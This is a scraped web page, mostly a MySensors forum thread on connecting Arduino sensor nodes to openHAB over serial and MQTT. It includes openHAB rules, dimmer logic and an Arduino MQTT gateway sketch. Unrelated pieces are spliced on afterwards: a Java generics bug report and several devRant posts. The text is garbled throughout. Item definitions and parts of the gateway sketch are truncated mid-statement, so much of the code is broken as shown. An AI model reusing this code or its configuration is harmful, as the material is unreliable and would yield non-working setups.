Arduino changed then /* Split messages separated with NEWLINE */ linebuffer= Arduino.state.toString.split("\n") Third part: Splitting messages according to the serial protocol buffer(0) = NODE_ID buffer(1) = CHILD_ID buffer(2) = MESSAGE_TYPE buffer(3) = SUB_TYPE buffer(4) = Message for (String element : linebuffer) { buffer = element.split(";") RadioID = new Integer(buffer.get(0)) switch (RadioID) { case 7: { SensorID = new Integer(buffer.get(1)) switch (SensorID) { case 0 : postUpdate (MySensorsT0, buffer.get(4)) case 1 : postUpdate (MySensorsT1, buffer.get(4)) case 2 : postUpdate (MySensorsT2, buffer.get(4)) case 3 : postUpdate (MySensorsT3, buffer.get(4)) } /*switch (SensorID) */ } /* case 7 */ case 6: { /* ExperimentalNode 6 - soll mal NODE 1 werden */ if (buffer.get(1)== "10") { /* child 10 ist der Homematic Anschluss */ postUpdate (HMSerialOut, buffer.get(4)) } /* if */ } /* case 6 */ case 9: { /* eigentlich war das mal NODE 6 */ if (buffer.get(1) == "2") { /* Child 2 ist der Schrittmacher */ transmissions_new = new Integer(buffer.get(4)) logInfo ("TRANS","Transmissions new " + transmissions_new.toString() ) logInfo ("TRANS","Transmissions old " + transmissions_old.toString() ) if (transmissions_old == 0) {transmissions_old = transmissions_new -1 } /* beim ersten mal passiert nichts */ transmissions_missed = transmissions_missed + (transmissions_new - transmissions_old - 1) transmissions_old = transmissions_new postUpdate (Missed_Transmissions, transmissions_missed.intValue.toString) postUpdate (Transmission_Count, transmissions_new.toString()) } } /* case 9 */ case 5: { if (buffer.get(1) == "0") { /* Child 0 ist die Luftfeuchte */ postUpdate (MySensorsMobHum, buffer.get(4)) } if (buffer.get(1) == "1") { /* Child 1 ist die Temperatur */ postUpdate (MySensorsMobTemp, buffer.get(4)) } } /*case 5: */ default: { postUpdate (MySensorsNode, buffer.get(0)) postUpdate (MySensorsChild, buffer.get(1)) postUpdate (MySensorsMtype, buffer.get(2)) postUpdate (MySensorsStype, buffer.get(3)) postUpdate (MySensorsMessage, buffer.get(4)) } } /*switch(RadioID) */ } /*for (String element) */ end So the drawback of the serial binding becomes obvious - every action has to be coded separately. On the other hand it offers enormous controlling possibilities (eg scene configurations), Fourth part: some actions triggerd from OpenHAB GUI/Webinterface: rule ArdSwon when Item ArduinoSwitch changed from OFF to ON then sendCommand(Arduino, "4;2;1;0;2;1\n") end rule ArdSwoff when Item ArduinoSwitch changed from ON to OFF then sendCommand(Arduino, "4;2;1;0;2;0\n") end rule HmArdon when Item ArduinoHMSw1 changed from ON to OFF then sendCommand(Arduino, "1;10;1;0;24;HD01004000000\n") end rule HmArdoff when Item ArduinoHMSw1 changed from OFF to ON then sendCommand(Arduino, "1;10;1;0;24;HD01004010000\n") end To send commands to the MySensors Network you have to use the same "Arduino"Item. In my oppinion another drawback. A separate way out would be nicer. Despite of my oppinion there is no interference between input and output - so i can live with this. The above example illustrates controlling a LED connected to an Arduino-UNO with the original Relais-Sketch, the second part controls some of my Homematic devices via another MySensors node (connected to Homematic via USB) . So at last I got a 2.4Ghz network to communicate with my Homematic and an ethernet connection via OpenHAB. In combination with direct interaction between certain MySensor nodes this results in a very redundant and stress-resistant home controlling network.) ? The light is entirely separate from the switch. In my specific case it will typically be a Z-wave relay controlling the light, so I will have to map the toggle switch to the light relay in openhab. This is why I assume I have to use a rule to achieve this. @kolaf Here's my code to use one or two switches to dimm. I hope it gives you some inspiration to connect your zwave switch. MQTT topics (exposed by the MQTT perl script. Node 120 = switch sensor, node 119 = dimmable light): /mySensors/120/0/V_LIGHT switch, reporting 1 when pressed, 0 when released /mySensors/120/1/V_LIGHT switch, reporting 1 when pressed, 0 when released /mySensors/120/2/V_LIGHT switch, reporting 1 when pressed, 0 when released /mySensors/119/0/V_DIMMER dimmable light, accepting integer value between 0 and 100 Items: Switch Switch_Up {[server:/mySensors/119/0/V_DIMMER:state:*:default]"} switchFromMqtt.map: (in transform folder) 0=OFF 1=ON Rules for 2-switch dimmer control (short press Switch_Up switches light on, short press Switch_Down switches light off, keep pressed to increase/decrease light level): val Long DimmerDelayMs = 333L rule "DimUp" when Item Switch_Up received update ON then var Boolean dimmed = false do { Thread::sleep(DimmerDelayMs) if (Switch_Up.state == ON) { sendCommand( Light_Dimmed, INCREASE ) dimmed = true; } } while (dimmed) if (!dimmed) sendCommand( Light_Dimmed, ON ) end rule "DimDown" when Item Switch_Down received update ON then var Boolean dimmed = false do { Thread::sleep(DimmerDelayMs) if (Switch_Down.state == ON) { sendCommand( Light_Dimmed, DECREASE ) dimmed = true; } } while (dimmed) if (!dimmed) sendCommand( Light_Dimmed, OFF ) end Rules for 1-switch dimmer control (short press switches light on/off (depending on current state), keep pressed to increase/decrease light level): rule "DimUpDown" when Item Switch_UpDown received update ON then var Boolean dimmed = false var Number percent = 0 if (Light_Dimmed.state instanceof DecimalType) percent = Light_Dimmed.state as DecimalType do { Thread::sleep(DimmerDelayMs) if (Switch_UpDown.state == ON) { // Start cycling up/down until released var Boolean dimmUp = percent < 100 do { if (Light_Dimmed.state instanceof DecimalType) percent = Light_Dimmed.state as DecimalType if (dimmUp) sendCommand( Light_Dimmed, INCREASE ) else sendCommand( Light_Dimmed, DECREASE ) if (percent >= 100) dimmUp = false; if (percent <= 0) dimmUp = true; dimmed = true; Thread::sleep(DimmerDelayMs) } while (Switch_UpDown.state == ON) } } while (dimmed) if (!dimmed) { // Short press: switch on or off, depending on current state if (percent > 0) sendCommand( Light_Dimmed, OFF ) else sendCommand( Light_Dimmed, ON ) } end Rule for the dimmable light: rule "MyDimmer0" when Item Light_Dimmed received command then var Number percent = 0 if(Light_Dimmed.state instanceof DecimalType) percent = Light_Dimmed.state as DecimalType if(receivedCommand==INCREASE) percent = percent + 5 if(receivedCommand==DECREASE) percent = percent - 5 if(receivedCommand==ON) percent = 100 if(receivedCommand==OFF) percent = 0 if(percent<0) percent = 0 if(percent>100) percent = 100 postUpdate(Light_Dimmed, percent) end Some stuff I'm still struggling with (any help/ideas appreciated): - Not sure if I can wrap (parts of) rules in a function to make re-use easier - Getting the current value of an item seems complicated first testing for DecimalType, then getting it. Maybe this can be done more efficient? - I use Thread::sleep to determine the timing of the buttons on the sensor node (pressed short/long). This will be influenced by the jitter on the sensor values received, but currently it seems to work fine. Furthermore Thread::sleep (probably) blocks whole rule processing, so this isn't a nice solution. The short/long presses can also be dermined on the sensor node and reported with different values, but then the sensor node is no longer a dumb switch and has to have knowledge of short/long presses.... @Yveaux Excellent, this is just what I needed, thank you. I started looking at your Perl script since this seems like the most active solution for openhab integration. I have a couple questions if you don't mind. Why do you have two versions of the gateway script, and which version should I use as a basis when adding serial support? Does your gateway take care of node ID assignments? I guess I will figure out that by reading more of code I'm thinking that I will fork your project to add a serial option to your script, controlled by some kind of commandline argument. @Yveaux Excellent, this is just what I needed, thank you. Glad I could help! Why do you have two versions of the gateway script, and which version should I use as a basis when adding serial support? The serial format changed from MySensors 1.3 (protocol 1) to 1.4beta (protocol 2). I was lazy and just cloned the 1.3 version to add 1.4 support (the 2-version). Wouldn't be hard to support both, but I really wrote this script for my own usage. It's not documented and I tried to help Damme in the past to build MQTT support. I'm primarily on 1.4b btw, with some 1.3 setup for backwards sniffer support... If more people start using it I should do some things the nice way Does your gateway take care of node ID assignments? I guess I will figure out that by reading more of code Not at the moment. Shouldn't be hard to implement though, but when you implement it you run into another issue of mapping the node-ID's onto the MQTT topic tree, or accessing the right topic from OpenHAB. Sticking to fixed Node ID's seemed to make more sense to me. I'm thinking that I will fork your project to add a serial option to your script, controlled by some kind of commandline argument. Feel free to fork, but the current code is based on AnyEvent. Not that I like it, but it seemed to have the best MQTT support. There is some hacking in the script to get things working, for which I don't know how they behave when switching to serial. Btw. there's one important thing to understand when using the Perl script. When it receives values from a sensor node through the gateway it's easy to publish the value in the topic-tree. When a value has to be sent to an actuator node, the story is different as the script has to know which topic to subscribe to at the MQTT broker. Currently when a mysensor node requests a value from the gateway the script automagically translates this into a subscription of the corresponding topic with the MQTT broker. The dimmer node for example, calls gw.request(childID, V_DIMMER) from setup to subscribe itself to dimmer messages. Note that sometimes this request gets lost (CRC error or so) and the subscription fails. While not supported by the MySensors library, a robust implementation should wait for a response after requesting this value and retry when it doesn't come. The Perl script stores all current subscriptions persistent (file subscriptions.storage) so restarting the Perl script will not force you to restart all nodes to subscribe again. And another small one; an RGB dimmer! MQTT topics (exposed by the MQTT perl script. Node 118 = 3-channel dimmable light): /mySensors/118/0/V_DIMMER dimmable light RED, accepting integer value between 0 and 100 /mySensors/118/1/V_DIMMER dimmable light GREEN, accepting integer value between 0 and 100 /mySensors/118/2/V_DIMMER dimmable light BLUE, accepting integer value between 0 and 100 Items: Dimmer Light_R {[server:/mySensors/118/1/V_DIMMER:state:*:default]"} Dimmer Light_B {mqtt=">[server:/mySensors/118/2/V_DIMMER:state:*:default]"} Color Light_RGB "RGB Dimmer" (Lights) Rules to distribute colorwheel value over R,G,B dimmers: rule "Set RGB value" when Item Light_RGB changed then var HSBType hsbValue = Light_RGB.state as HSBType postUpdate( Light_R, hsbValue.red.intValue ) postUpdate( Light_G, hsbValue.green.intValue ) postUpdate( Light_B, hsbValue.blue.intValue ) end No button control here; just using the colorwheel and on/off buttons in the GUI. Enjoy! - Damme Code Contributor last edited by Damme rule to calculate absolute humidity and dew point from degree Celsius and rH% import java.lang.Math import java.lang.Integer import java.lang.Double rule "Calculate absolute humidity (g h2o / m3 air) and dew point" when Item temp1 changed or Item hum1 changed then var temp = temp1.state as DecimalType var hum = hum1.state as DecimalType var t1 = (17.271*temp.floatValue) / (237.7+temp.floatValue) + Math::log(hum.floatValue*0.01) var dew = (237.7 * t1) / (17.271 - t1) var Number c1 = ((17.67*temp.floatValue)/(temp.floatValue+243.5)) var abs = (Math::pow(Math::E,c1.doubleValue)*6.112*2.1674*hum.floatValue) /(273.15+temp.floatValue) Dewpoint1.postUpdate(dew) AbsHum1.postUpdate(abs) end Hi everyone! I'm new in the topic. I find it very interesting the world of mysensors. I would like to ask whether there is a description of someone that I can set my mqtt openHAB bindings eg .: an Arduino LED dimmer ? I already read broker-gateway I made a Humidity sensor node, and Relay node, too. It would be good if we had a basic description or example project for beginners from all sensor type. It is not rocket science to get the openHAB running w/MQTT gateway, see for example my post with DS/Light/Relay in But sure, it would be great to put a wiki with all sensor settings for openHAB together on one page. I needed to read/search for some days to put the knowledge together... Example of the openhab screenshots on mobile There you see also the mapping of the sensor How can I make openhad respod to gw.request(sensor, V_HEATER_SW,0); I have a relay actuator sketch and in setup() I have this for (int sensor=1 ; sensor<=NUMBER_OF_RELAYS;sensor++) { gw.present(sensor, S_HEATER); gw.request(sensor, V_HEATER_SW,0); } practically I would like openhab to respond to the gw.request with the actual state of the relay. My item definition is the follwing. I am able to ON and OFF the relay, but I need to find a way to get the values from openhab of the relays when the relay actuator arduino reboots. Switch Incalzire_Releu_GF_Living2 "Incalzire Releu Living 2" <heating> (Incalzire) {mqtt=">[mysensor:MyMQTT/3/2/V_HEATER_SW:command:ON:1],>[mysensor:MyMQTT/3/2/V_HEATER_SW:command:OFF:0]"} is there any sample code for controlling RGB led here? Sorry to Necro this thread but had a question, I believe I read somewhere that you can use a serial gateway connected to a pi and have openhab/mqtt run on the pi? How would one go about setting this up? Currently I have 2 Unos one running as the serial gateway. I plan to replace the serial gateway with a nano I'm still waiting on that. I just got the pi last night so I'm still working on getting everything up and running on that but I'd rather just connect the gateway directly to the pi rather than have to get a wifi/ethernet module for one of the arduinos. Also probably outside the scope of this thread (and thats fine) but anyone have a good guide for setting up the pi for openhab/MQTT? @Chaotic , Try this.. Worked great for me @mhortman Didn't work for me: sudo wget --2015-03-27 10:46:51-- Resolving repo.mosquitto.org (repo.mosquitto.org)... 85.119.83.194, 2001:ba8:1f1:f271::2 Connecting to repo.mosquitto.org (repo.mosquitto.org)|85.119.83.194|:80... connected. HTTP request sent, awaiting response... 403 Forbidden 2015-03-27 10:46:51 ERROR 403: Forbidden.' - quocanhcgd last edited by My house have 4 floor, i have plan build one gateway for each floor. Each floor has 4-5 sensors (temp, hum, relay, light, door, RF light). Each sensors use NRF24 to connect with gateway. Gateway connect to RAS by ethernet. My question: - Can i build 2 gateway mqtt connect to openhab? if not, what my solution to solve ? Thanks - rachmat aditiya27 last edited by you can build more than 1 gateway for that, but rather than mqtt. I think it's better to use ethernet or serial gateway because mqtt gateway has lot of problem, I tried it for months. You can forward mqtt from fhem to mosquito. @Yveaux could you please post your arduino code of controlling your RGB (I guess it´s a RGB LED Strip!?)? Thanks for your help!! I build up a mqtt gateway and configured it in openhab.cfg. Now I would like to set up a mosquitto server on a raspberry pi, too. Is it possible to add this new MQTT server to the openhab.cfg beside the already set up MQTT gateway? Why not setup the Mosquitto broker connect OpenHab to it and use the MQTTClientGateway which connects as a client to the Mosquitto broker. Has been discussed at several places in the forum already. You can find the MQTTClientGateway in the development branch. - John Connolly last edited by This post is deleted! @tomkxy I´m reading in the forums for weeks now, but I don´t get it to work. I´ve succesfully set up Mosquitto on my raspi, also openHAB is running there. MQTTEthernetGateway (from Startpage) is pingable. One sensor is running and working. I don´t know how to get the MQTTEthernetGateway communicate with the Mosquitto Broker. I´ve read about "bridging" what made me more confused as I already was. So, right now, when I subscribe to MyMQTT/# using "mosquitto_sub -t MyMQTT/#" on my Raspi I don´t see any communication coming in. What do I have to do to get the MQTTEthernetGateway (=MQTTClientGateway I suppose!?!) connecting to Mosquitto? Or: must I setup the MQTTEthernetGateway like this: instead of using the sketch from? Thanks for your help!! @siod I am not sure to what code you are exactly referring to if you say MQTTEthernetGateway. In the mysensor Github he cleaned up the code I merged from my Github. I did not test that code so far. So I can only comment on the MQTTClientGateway you can find in my Github in branch MQTTClientGateway. I suggest you start off ignoring Openhab at the moment. Just test with clients using mosquitto_sub and mosquito_pub commands from mosquito. In the MQTTClientGateway sketch you need to adapt the IP related infos. See excerpt from my config. / }; Depending on whether you use the signing feature or not you have to comment the define MY_SIGNING_FEATURE in my_config.h. If your sketch is running you should see one additional client connected on your mosquito broker. You can subscribe with mosquito_sub to $SYS/# which gives you all sorts of statistics. In order to check whether your Arduino connected to the broker you can also put a debug statement in the loop function. Just check and print the return code from the client.connect() call. If the connect did not work double check that you configured the correct IP address and port, and make also sure that you fulfill the authentication requirements configured in the broker. If the connection works publish a message to the broker for a topic like MyMQTT/27/5/V_PRESSURE The MQTTClientGateway sketch should receive that and you should see that in the log. Next reset your sensor node. You should see a message being processed by MQTTClientGateway and then being published to the MQTT broker. Only after all that works you start dealing with OpenHab. Hope that helps. Hi tomkxy, thanks for your detailed answer, I will test all your suggestions after I got my GW work on LAN, right now it´s not answering to pings and I don´t get it why.... I´ve uploaded the ntruchsees sketch from now and configured IP address, port and MAC. When I was talking about MQTTEthernetGateway I was talking about the MySensors Sketch at. I will get back to you and give your more info as soon as the Gateway in it´s actual state works in my network! @siod I adapted the ntruchsees for the MySensors library version 1.5 which you find here I could compile your code now, unfortunately I still cannot ping the gw. BTW: In ntruchsess`code I had to enter the Mosquitto broker IP, why isn´t this part in your code? //replace with ip of server you want to connect to, comment out if using 'remote_host' uint8_t remote_ip[] = { 192, 168, 1, 50 }; It is the same in my code. See the code extract in the previous reply above. The variable is remote_ip[]. sorry, but I can´t fin it in - Created by Daniel Wiegert <[email protected]> * * DESCRIPTION * MyMQTT Broker Gateway 0.1b * Latest instructions found here: * * * *: * */ #include <DigitalIO.h> #include <SPI.h> #include <MySigningNone.h> #include <MyTransportRFM69.h> #include <MyTransportNRF24.h> #include <MyHwATMega328.h> #include <MySigningAtsha204Soft.h> #include <MySigningAtsha204.h> #include <MySensor.h> #include <MsTimer2.h> #include <Ethernet.h> #include "MyMQTT.h" #define INCLUSION_MODE_TIME 1 // Number of minutes inclusion mode is enabled #define INCLUSION_MODE_PIN 3 // Digital pin used for inclusion mode button // **/ #define TCP_PORT 1883 // Set your MQTT Broker Listening port. IPAddress TCP_IP ( 192, 168, 1, 51 ); // Configure your static ip-address here byte TCP_MAC[] = { 0x02, 0xDE, 0xAD, 0x00, 0x00, 0x42 }; // Mac-address - You should change this! see note *2 above! ////////////////////////////////////////////////////////////////// // NRFRF24L01 radio driver (set low transmit power by default) MyTransportNRF24 transport(RADIO_CE_PIN, RADIO_SPI_SS_PIN, RF24_PA_LEVEL_GW); //MyTransportRFM69 transport; //) MySensor gw(transport, hw /*, signer*/); EthernetServer server = EthernetServer(TCP_PORT); EthernetClient *currentClient = NULL; MyMessage msg; char convBuf[MAX_PAYLOAD*2+1]; char broker[] PROGMEM = MQTT_BROKER_PREFIX; bool MQTTClientConnected = false; uint8_t buffsize; char buffer[MQTT_MAX_PACKET_SIZE]; volatile uint8_t countRx; volatile uint8_t countTx; volatile uint8_t countErr; void writeEthernet(const char *writeBuffer, uint8_t *writeSize) { #ifdef TCPDUMP Serial.print(">>"); char buf[4]; for (uint8_t a=0; a<*writeSize; a++) { sprintf(buf,"%02X ",(uint8_t)writeBuffer[a]); Serial.print(buf); } Serial.println(""); #endif server.write((const uint8_t *)writeBuffer, *writeSize); } void processEthernetMessages() { char inputString[MQTT_MAX_PACKET_SIZE] = ""; byte inputSize = 0; byte readCnt = 0; byte length = 0; EthernetClient client = server.available(); if (client) { while (client.available()) { // Save the current client we are talking with currentClient = &client; byte inByte = client.read(); readCnt++; if (inputSize < MQTT_MAX_PACKET_SIZE) { inputString[inputSize] = (char)inByte; inputSize++; } if (readCnt == 2) { length = (inByte & 127) * 1; } if (readCnt == (length+2)) { break; } } #ifdef TCPDUMP Serial.print("<<"); char buf[4]; for (byte a=0; a<inputSize; a++) { sprintf(buf, "%02X ", (byte)inputString[a]); Serial.print(buf); } Serial.println(); #endif processMQTTMessage(inputString, inputSize); currentClient = NULL; } } void incomingMessage(const MyMessage &message) { rxBlink(1); sendMQTT(message); } void setup() { Ethernet.begin(TCP_MAC, TCP_IP); countRx = 0; countTx = 0; countErr = 0; // Setup led pins pinMode(RADIO_RX_LED_PIN, OUTPUT); pinMode(RADIO_TX_LED_PIN, OUTPUT); pinMode(RADIO_ERROR_LED_PIN, OUTPUT); digitalWrite(RADIO_RX_LED_PIN, LOW); digitalWrite(RADIO_TX_LED_PIN, LOW); digitalWrite(RADIO_ERROR_LED_PIN, LOW); // Set initial state of leds digitalWrite(RADIO_RX_LED_PIN, HIGH); digitalWrite(RADIO_TX_LED_PIN, HIGH); digitalWrite(RADIO_ERROR_LED_PIN, HIGH); // Add led timer interrupt MsTimer2::set(300, ledTimersInterrupt); MsTimer2::start(); // give the Ethernet interface a second to initialize delay(1000); // Initialize gateway at maximum PA level, channel 70 and callback for write operations gw.begin(incomingMessage, 0, true, 0); // start listening for clients server.begin(); Serial.println("Ok!"); Serial.println(TCP_IP); } void loop() { gw.process(); processEthernetMessages(); } inline MyMessage& build (MyMessage &msg, uint8_t destination, uint8_t sensor, uint8_t command, uint8_t type, bool enableAck) { msg.destination = destination; msg.sender = GATEWAY_ADDRESS; msg.sensor = sensor; msg.type = type; mSetCommand(msg,command); mSetRequestAck(msg,enableAck); mSetAck(msg,false); return msg; } char *getType(char *b, const char **index) { char *q = b; char *p = (char *)pgm_read_word(index); while (*q++ = pgm_read_byte(p++)); *q=0; return b; } void processMQTTMessage(char *inputString, uint8_t inputPos) { char *str, *p; uint8_t i = 0; buffer[0]= 0; buffsize = 0; (void)inputPos; if ((uint8_t)inputString[0] >> 4 == MQTTCONNECT) { buffer[buffsize++] = MQTTCONNACK << 4; buffer[buffsize++] = 0x02; // Remaining length buffer[buffsize++] = 0x00; // Connection accepted buffer[buffsize++] = 0x00; // Reserved MQTTClientConnected=true; // We have connection! } if ((uint8_t)inputString[0] >> 4 == MQTTPINGREQ) { buffer[buffsize++] = MQTTPINGRESP << 4; buffer[buffsize++] = 0x00; } if ((uint8_t)inputString[0] >> 4 == MQTTSUBSCRIBE) { buffer[buffsize++] = MQTTSUBACK << 4; // Just ack everything, we actually dont really care! buffer[buffsize++] = 0x03; // Remaining length buffer[buffsize++] = (uint8_t)inputString[2]; // Message ID MSB buffer[buffsize++] = (uint8_t)inputString[3]; // Message ID LSB buffer[buffsize++] = MQTTQOS0; // QOS level } if ((uint8_t)inputString[0] >> 4 == MQTTUNSUBSCRIBE) { buffer[buffsize++] = MQTTUNSUBACK << 4; buffer[buffsize++] = 0x02; // Remaining length buffer[buffsize++] = (uint8_t)inputString[2]; // Message ID MSB buffer[buffsize++] = (uint8_t)inputString[3]; // Message ID LSB } if ((uint8_t)inputString[0] >> 4 == MQTTDISCONNECT) { MQTTClientConnected=false; // We lost connection! } if (buffsize > 0) { writeEthernet(buffer,&buffsize); } // We publish everything we get, we dont care if its subscribed or not! if ((uint8_t)inputString[0] >> 4 == MQTTPUBLISH || (MQTT_SEND_SUBSCRIPTION && (uint8_t)inputString[0] >> 4 == MQTTSUBSCRIBE)) { buffer[0]= 0; buffsize = 0; // Cut out address and payload depending on message type. if ((uint8_t)inputString[0] >> 4 == MQTTSUBSCRIBE) { strncat(buffer,inputString+6,inputString[5]); } else { strncat(buffer,inputString+4,inputString[3]); } #ifdef DEBUG Serial.println(buffer); #endif // TODO: Check if we should send ack or not. for (str = strtok_r(buffer,"/",&p) ; str && i<4 ; str = strtok_r(NULL,"/",&p)) { if (i == 0) { if (strcmp_P(str,broker)!=0) { //look for MQTT_BROKER_PREFIX return; //Message not for us or malformatted! } } else if (i==1) { msg.destination = atoi(str); //NodeID } else if (i==2) { msg.sensor = atoi(str); //SensorID } else if (i==3) { unsigned char match=255; //SensorType #ifdef MQTT_TRANSLATE_TYPES for (uint8_t j=0; strcpy_P(convBuf, (char*)pgm_read_word(&(vType[j]))) ; j++) { if (strcmp((char*)&str[2],convBuf)==0) { //Strip V_ and compare match=j; break; } if (j >= V_TOTAL) break; } #endif if ( atoi(str)!=0 || (str[0]=='0' && str[1] =='\0') ) { match=atoi(str); } if (match==255) { match=V_UNKNOWN; } msg.type = match; } i++; } //Check if packge has payload if ((uint8_t)inputString[1] > (uint8_t)(inputString[3]+2) && !((uint8_t)inputString[0] >> 4 == MQTTSUBSCRIBE)) { strcpy(convBuf,inputString+(inputString[3]+4)); msg.set(convBuf); //Payload } else { msg.set(""); //No payload } txBlink(1); if (!gw.sendRoute(build(msg, msg.destination, msg.sensor, C_SET, msg.type, 0))) errBlink(1); } } void sendMQTT(const MyMessage &inMsg) { MyMessage msg = inMsg; buffsize = 0; if (!MQTTClientConnected) return; //We have no connections - return if (msg.isAck()) { //, msg.sender, 255, C_INTERNAL, I_CONFIG, 0).set(MQTT_UNIT))) errBlink(1); return; }, msg.sender, 255, C_INTERNAL, I_ID_RESPONSE, 0).set(newNodeID))) errBlink(1); return; } } if (mGetCommand(msg)!=C_PRESENTATION) { if (mGetCommand(msg)==C_INTERNAL) msg.type=msg.type+(S_FIRSTCUSTOM-10); //Special message buffer[buffsize++] = MQTTPUBLISH << 4; // 0: buffer[buffsize++] = 0x09; // 1: Remaining length with no payload, we'll set this later to correct value, buffsize -2 buffer[buffsize++] = 0x00; // 2: Length MSB (Remaing length can never exceed ff,so MSB must be 0!) buffer[buffsize++] = 0x08; // 3: Length LSB (ADDR), We'll set this later strcpy_P(buffer+4, broker); buffsize+=strlen_P(broker); #ifdef MQTT_TRANSLATE_TYPES if (msg.type > V_TOTAL) msg.type=V_UNKNOWN;// If type > defined types set to unknown. buffsize+=sprintf(&buffer[buffsize],"/%i/%i/V_%s",msg.sender,msg.sensor,getType(convBuf, &vType[msg.type])); #else buffsize+=sprintf(&buffer[buffsize],"/%i/%i/%i",msg.sender,msg.sensor,msg.type); #endif buffer[3]=buffsize-4; // Set correct address length on byte 4. #ifdef DEBUG Serial.println((char*)&buffer[4]); #endif msg.getString(convBuf); for (uint8_t a=0; a<strlen(convBuf); a++) {// Payload buffer[buffsize++] = convBuf[a]; } buffer[1]=buffsize-2; // Set correct Remaining length on byte 2. writeEthernet(buffer,&buffsize); } } }; } } Also I must mention I am using a ENC28J60 chip on my Ethernet module. Could that be the problem of not answering to pings? edit: Ah, sure, got the network problem: //#include <Ethernet.h> #include <UIPEthernet.h> But still, remote_ip is not in the code I copied from your github library. Maybe you can post the correct code here!? edit: Ok, finally got it. I must admit I am not good in using Github, it´s very new to me... Question: Do I always have to download the complete branch and overwrite my arduino file with it or ist it enough to only download your MQTTClientGateway example? Just for me to understand this... Of course, when using the UIPEthernet library, the sketch is too big now...Is there a workaround? @siod Sorry, i don't know whether that makes sense here. I do not know where this code came from. I pointed you to the the contribution I made which is here: in the MQTTClient branch (follow the link, select the branch mqttclient and click through the directories: libraries/MySensors/examples/MQTTClientGateway/ ). As I wrote before the current development branch of the official MySensors library contains a cleaned up and re-factored version I didn't test and can say nothing about. I found a W5100 Ethernet Module et voila, everything works fine now!!! Thanks for your help @tomkxy !! @siod If it works now you probably can give it a try with the latest version in the development branch of the Mysensor library. And another small one; an RGB dimmer! I tried this 3-dimmer approach, but I found it not responsive enough. Sometimes the arduino can't be fast enough to process 3 consecutive requests, and the result is lame. (it changes 2 of 3 colors only) I think this would be more efficient with transmitting just one cummulative message with all 3 colors and decoding it in arduino. @ericsko sounds to me that you're missing a message instead of the Arduino being too 'slow'. But go ahead, use a single message to send the rgb value and post your findings in here!
https://forum.mysensors.org/topic/302/openhab-mqtt-tips-hints
CC-MAIN-2020-24
en
refinedweb
Name: jl125535 Date: 09/08/2004 A DESCRIPTION OF THE REQUEST : Type that is used as parameter for templates(generics) is not accessible at in runtime. For example the following programs do not compile. -------------------------------------------- public class a<T> { public void tellMeParameterType() { System.out.println(T.class.getName()); } public static void main(String args[]) { (new a<String>()).tellMeYourType(); (new a<Integer>()).tellMeYourType(); } } ----------------------------------------------------- public class b<T> { public void isMine(Object object) { System.out.println(object instanceof T); } public static void main(String args[]) { (new b<String>()).isMine("Test"); (new b<Integer>()).isMine("Test"); } } JUSTIFICATION : This functionality is essential for frameworks that use reflection and generics. Sometime decision have to be made basing on type supplied as parameter. EXPECTED VERSUS ACTUAL BEHAVIOR : EXPECTED - If type is being asked in instance assign it to private variable then use this variable in instance. Also methods like newInstance() could require such variable to be supplied or use upper bound it is not supplied. Another variant is to allow type to be referenced in constructor only so the following sample will work. In that case user will pay only for actually used features: public class b1<T> { final Class myClass; public b1() { myClass = T.class; }; public void isMine(Object object) { System.out.println(myClass.isAssignableFrom(object.getClass())); } public static void main(String args[]) { (new b1<String>()).isMine("Test"); (new b1<Integer>()).isMine("Test"); } } ACTUAL - Samples just do not work. ---------- BEGIN SOURCE ---------- See samples above. The best thing is all of them start to work. But at least b1 should work in order for generics to be useful. ---------- END SOURCE ---------- CUSTOMER SUBMITTED WORKAROUND : None. Except to pass class explicitly in constructor of the object. But it would completly defeat purpose of generics. (Incident Review ID: 302318) ======================================================================
https://bugs.java.com/bugdatabase/view_bug.do?bug_id=5099091
CC-MAIN-2020-24
en
refinedweb
Join devRant - - What the fuck student. Why in fuck would you submit a python assignment in word. So that all the formatting you know the stuff that tells python how to run the code all fucks up. How the fuck can I mark this - Me: Oh it's just a simple formatting/styling issue, shouldn't take but a minute Computer: *laughs in html*7 - - - Code review. Now let me be clear and say I’m not against code review in general and I think it’s a critical part of the engineering process... But picture this situation: Q: “Why is this const?” A: because it is invariant and more information for the compiler means it’s easier to forward constants etc. Q: “why don’t you do it this other way that’s no better than what you did here?” A: “stop wasting time” Q: “I’m going to block submission of this emergency patch because of code formatting and then go home for the day” A: ... Q: <asks about some other c++ semantic related to the change under review> A: <explains basic c++ language topology while simultaneously wondering why this is the appropriate forum for it> Q: “you should have designed this the way I would” A: ... There are some great code reviewers on my team but there are just as many time wasters who’s comments seem more related to not knowing how c++ works and how compilers work than actual deficiencies in my code. I’ve also tried to bring better readability to our codebase in ways that are so subtle they are almost style agnostic and that has been met with fierce resistance (our codebase is actually quite good but has no naming conventions or file conventions whatsoever and it’s nuts how frustrating it is) I guess to put it more precisely my issue with code review starts when it becomes somebody else’s forum to prove they’re smart enough and hard working enough to be worth their salary rather than a forum for improving submissions and catching bugs. I have a big fucking issue with that.13 - - - After the backlash I received from some devRant users about my text formatting, here is a properly formatted, and properly punctuated rant. You see... It's boring.12 - @dfox Can we have the option to include code blocks in rants and comments? So that they're formatted as monospace text? I mean we can get around it with pictures, but it would be a nice option to include code with an appropriate font. = - - Why is it formatted like this? Cant they just do a \n on a capital Letter? This looks so terrible😢 - Telling someone you don't like the way they format their code is like... Telling them their girlfriend is ugly.5 - - Warning: the following image may cause severe eye damage and temporary autism. Viewer discretion is advised!11 - <label> Name</label> I don't know what kind of maniac formats their HTML like this. How do you sleep well at night?3 - - - I love Json format. It is so simple, powerful, easy to read and all that good stuffs. There is only one thing I wish Json could support, that's commenting.2 - Actual formatting in my high school textbook. (also fstream.h). And the code my teacher writes isn't much better.28 - - devRant feature idea: Text formatting in Markdown. This is a community for developers, after all.14 - - Oh my dear DevRant, please add code-formatting standards & check-style validation on submitted code snippets, because the wrong indentations of code snippet posts on DevRant is driving me crazy, check-style ftw!2 - - - Accidentally restored a months old backup because I thought the software was using imperial date formatting. I was wrong.7 - So following from this rant:... Warning long rant ahead I resigned and my last day is tomorrow, I've released the app updates a week ago, patched a couple bugs for iOS. My boss and the idiot who can't open an email on his phone go off to use the app as part of some training thing for the company. I got a call yesterday saying the Android app has issues and I proceeded to ask my boss what type of phone they have: "Samsung and Huawei" I thought okay I need more info "what type of phone..." He responds with wouldn't have a clue.... I can't see the phone, didn't get a screenshot or anything like that but I'm expected to just know what the phone is. My boss goes on to say yeah it's the app (he is literally the most computer illiterate person I could think of aside from guy who can't open emails on phone, how the fuck do you know that?) Me: "From all the testing I've done the app works" Look if you want a more robust error free update hire more than one developer I can't test every single fucking use case to determine the app is 100% bug free, I've tested on at least 10 phones before releasing the update just to be absolutely sure I got everything done and okay I 